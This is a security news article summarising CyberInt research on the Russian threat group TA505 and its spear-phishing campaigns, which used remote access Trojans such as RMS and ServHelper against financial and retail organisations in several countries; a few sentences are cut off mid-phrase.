Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.
“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a
The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.
The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including
the Dridex banking trojan, tRAT RAT, FlawedAmmy RAT,
Philadelphia ransomware, GlobeImposter and Locky ransomware.
Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.
In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.
In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.
In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a
The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.
Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.
The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.
Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.
The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.
At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.
Further technical details on the attacks are included in the report published by Cyberint.
(SecurityAffairs – hacking, VSDC)